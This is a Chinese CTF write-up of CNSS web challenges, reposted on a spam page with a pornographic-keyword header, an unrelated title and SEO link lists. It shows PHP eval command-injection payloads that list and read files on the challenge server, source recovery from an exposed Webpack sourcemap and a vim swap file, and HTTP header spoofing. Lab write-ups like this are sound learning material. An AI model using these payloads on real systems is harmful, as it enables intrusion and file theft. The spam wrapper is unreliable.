中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

做同性戀的珠寶網(wǎng)站尋找外貿(mào)客戶的網(wǎng)站

做同性戀的珠寶網(wǎng)站,尋找外貿(mào)客戶的網(wǎng)站,十大電子元器件采購(gòu)商城,app項(xiàng)目策劃書(shū)[Baby] SignIn 進(jìn)來(lái)看到 按鈕點(diǎn)擊不了,想到去修改代碼,要“檢查“,但這里的右鍵和F12都不可用 還好還有其他方法 檢查的各種方法 選用一種后進(jìn)入檢查頁(yè)面 刪掉這里的disabled即可 點(diǎn)擊后得到flag [Baby] Backdoor 進(jìn)入&#xff0c…

[Baby] SignIn

進(jìn)來(lái)看到
在這里插入圖片描述

按鈕點(diǎn)擊不了,想到去修改代碼,要“檢查“,但這里的右鍵和F12都不可用
還好還有其他方法
檢查的各種方法

選用一種后進(jìn)入檢查頁(yè)面
在這里插入圖片描述

刪掉這里的disabled即可
在這里插入圖片描述

點(diǎn)擊后得到flag
在這里插入圖片描述

[Baby] Backdoor

進(jìn)入,看到
在這里插入圖片描述

有eval,利用命令執(zhí)行漏洞

cnss=system('ls /');

在這里插入圖片描述

獲取flag文件夾里的文件名:

cnss=system('ls /flag');

在這里插入圖片描述

獲取flag:

cnss=system('cat //flag');

在這里插入圖片描述

[Baby] Webpack

了解一下什么是Webpack,及其有什么漏洞

Webpack是一個(gè)用于構(gòu)建現(xiàn)代Web應(yīng)用程序的開(kāi)源JavaScript模塊打包工具。它可以將多個(gè)JavaScript、CSS、圖片等資源打包成一個(gè)或多個(gè)優(yōu)化后的bundle文件,以提高應(yīng)用程序的性能和加載速度。Webpack通過(guò)模塊化的方式管理代碼,使開(kāi)發(fā)者可以以模塊化的方式編寫(xiě)代碼,然后通過(guò)Webpack將這些模塊打包成可在瀏覽器中執(zhí)行的代碼。

可能有源代碼泄漏:不正確的配置可能導(dǎo)致打包后的源代碼在生產(chǎn)環(huán)境中被泄漏。這道題就是此漏洞,具體利用方式如下:

進(jìn)入題目,看到
在這里插入圖片描述

檢查,找到.js文件
在這里插入圖片描述
知道其路徑為:http://124.221.34.13:50003/static/js/main.c91fb7d1.js

訪問(wèn)http://124.221.34.13:50003/static/js/main.c91fb7d1.js.map,就成功下載了源代碼
在這里插入圖片描述

此文件還需要還原,先安裝工具
如何還原前端代碼

請(qǐng)隨便選一個(gè)文件夾(記得把源代碼移進(jìn)去),打開(kāi)cmd
在這里插入圖片描述在這里插入圖片描述

還原:reverse-sourcemap -v main.c91fb7d1.js.map -o output,得到還原后的代碼
在這里插入圖片描述在這里插入圖片描述
找到flag
在這里插入圖片描述

[Easy] Leak

得看一下題目描述
在這里插入圖片描述

先了解一下上面情況會(huì)出現(xiàn)什么漏洞:
使用vim時(shí)會(huì)創(chuàng)建臨時(shí)緩存文件,關(guān)閉vim時(shí)緩存文件則會(huì)被刪除

當(dāng)vim異常退出后,因?yàn)槲刺幚砭彺嫖募?#xff0c;導(dǎo)致可以通過(guò)緩存文件恢復(fù)原始文件內(nèi)容

以 index.php 為例:第一次產(chǎn)生的交換文件名為 .index.php.swp

再次意外退出后,將會(huì)產(chǎn)生名為 .index.php.swo 的交換文件

第三次產(chǎn)生的交換文件則為 .index.php.swn
——————————
來(lái)獲取.index.php.swp,并整理其中代碼
在這里插入圖片描述

查看根目錄文件:

/?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f=system('ls /');

在這里插入圖片描述

得到flag:

/?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f=system('cat  /fl4444444g');

在這里插入圖片描述

[Easy] ezhttp

進(jìn)來(lái),看到
在這里插入圖片描述

http的題目一般來(lái)說(shuō)直接抓包,再去一步一步地滿足要求
1
在這里插入圖片描述
在文件開(kāi)頭把GET修改為CNSS

CNSS /Index HTTP/1.1

2
在這里插入圖片描述
修改User-Agent

User-Agent: Mozilla/5.0 (Linux; Android 10; XXX Build/QKQ1.190910.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 MicroMessenger/8.0.0.1920(0x2800004D) Process/appbrand2 WeChat/arm32

3
在這里插入圖片描述
修改Referer

Referer:cnss.io

4
在這里插入圖片描述
修改X-Forwarded-For

X-Forwarded-For:127.0.0.1

5
在這里插入圖片描述
修改HOST

Host: uestc.edu.cn

6
在這里插入圖片描述
修改Content-Type

Content-Type: application/json

7
在這里插入圖片描述在最下面胡亂輸入
在這里插入圖片描述
8
在這里插入圖片描述
給一個(gè)json數(shù)據(jù)

{"name": "Alice","age": 25
}

9
在這里插入圖片描述
把一個(gè)數(shù)據(jù)命名為password

{"password": "Alice","age": 25
}

10
在這里插入圖片描述
把一個(gè)數(shù)據(jù)命名為name

{"name": "Alice","password": "25"
}

11
在這里插入圖片描述
json和Cookie改為相同
在這里插入圖片描述

12
在這里插入圖片描述
先了解如何在HTTP請(qǐng)求中表示Basic認(rèn)證:

構(gòu)建認(rèn)證字符串:將用戶名和密碼用冒號(hào)分隔,然后將該字符串進(jìn)行Base64編碼。例如,如果用戶名是 "username",密碼是 "password",您可以將它們合并并進(jìn)行Base64編碼得到 "dXNlcm5hbWU6cGFzc3dvcmQ="。添加認(rèn)證頭部:將Base64編碼后的認(rèn)證字符串添加到HTTP請(qǐng)求頭的 "Authorization" 字段中,使用 "Basic" 前綴。 Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=

方法:修改Authorization

Authorization: Basic MTIzOjEyMzQ1Ng==

————————————————————
得到flag咯:
在這里插入圖片描述

http://www.risenshineclean.com/news/873.html

相關(guān)文章:

  • 人大網(wǎng)站建設(shè)報(bào)價(jià)單湖北網(wǎng)站seo
  • 建設(shè)的網(wǎng)站搜索引擎關(guān)鍵詞優(yōu)化
  • wordpress 融資谷歌seo網(wǎng)絡(luò)公司
  • 貴陽(yáng)網(wǎng)站建設(shè)服務(wù)公司網(wǎng)站注冊(cè)查詢(xún)
  • 新手網(wǎng)站百度seo規(guī)則
  • 小程序開(kāi)發(fā)平臺(tái)哪家產(chǎn)品較好汕頭seo快速排名
  • 有沒(méi)有專(zhuān)門(mén)做設(shè)計(jì)的網(wǎng)站外貿(mào)seo建站
  • 伍佰億網(wǎng)站怎么做2020年可用好用的搜索引擎
  • 圖躍網(wǎng)站建設(shè)國(guó)外網(wǎng)站開(kāi)發(fā)
  • seo網(wǎng)站推廣優(yōu)化站長(zhǎng)工具綜合查詢(xún)官網(wǎng)
  • 網(wǎng)站建設(shè)公司怎么賺錢(qián)網(wǎng)絡(luò)宣傳推廣
  • php與dw怎么做校園網(wǎng)站seo教程
  • 備案期間怎么做網(wǎng)站十大搜索引擎
  • 寧波網(wǎng)站建設(shè) 熊掌號(hào)服務(wù)營(yíng)銷(xiāo)策略
  • be設(shè)計(jì)網(wǎng)站自己開(kāi)發(fā)網(wǎng)站
  • 時(shí)尚字體設(shè)計(jì)網(wǎng)站網(wǎng)絡(luò)營(yíng)銷(xiāo)推廣的方式
  • 樂(lè)清網(wǎng)站建設(shè)公司網(wǎng)絡(luò)軟文營(yíng)銷(xiāo)案例3篇
  • 免費(fèi)網(wǎng)站建設(shè)加盟亞洲衛(wèi)星電視網(wǎng)參數(shù)表
  • 網(wǎng)站建設(shè) 中企動(dòng)力公司搭建網(wǎng)站的步驟和順序
  • 網(wǎng)站app開(kāi)發(fā)平臺(tái)百度非企渠道開(kāi)戶
  • 孝感網(wǎng)站開(kāi)發(fā)的公司電話集客營(yíng)銷(xiāo)軟件
  • 攀枝花建設(shè)工程有限責(zé)任公司網(wǎng)站一元友情鏈接平臺(tái)
  • 池州專(zhuān)業(yè)網(wǎng)站建設(shè)谷歌搜索引擎鏡像
  • 網(wǎng)站設(shè)計(jì) 電子購(gòu)物網(wǎng)站設(shè)計(jì)網(wǎng)絡(luò)精準(zhǔn)推廣
  • 電商網(wǎng)站建設(shè)推廣企業(yè)網(wǎng)絡(luò)規(guī)劃設(shè)計(jì)方案
  • 網(wǎng)站建設(shè)的結(jié)論和體會(huì)百度推廣營(yíng)銷(xiāo)中心
  • 柳州正規(guī)網(wǎng)站制作公司發(fā)稿網(wǎng)
  • 牛街網(wǎng)站建設(shè)免費(fèi)網(wǎng)站推廣軟件哪個(gè)好
  • 電子書(shū)籍網(wǎng)站開(kāi)發(fā)推廣鏈接點(diǎn)擊器網(wǎng)頁(yè)
  • 如何開(kāi)一個(gè)微信公眾號(hào)seo顧問(wèn)合同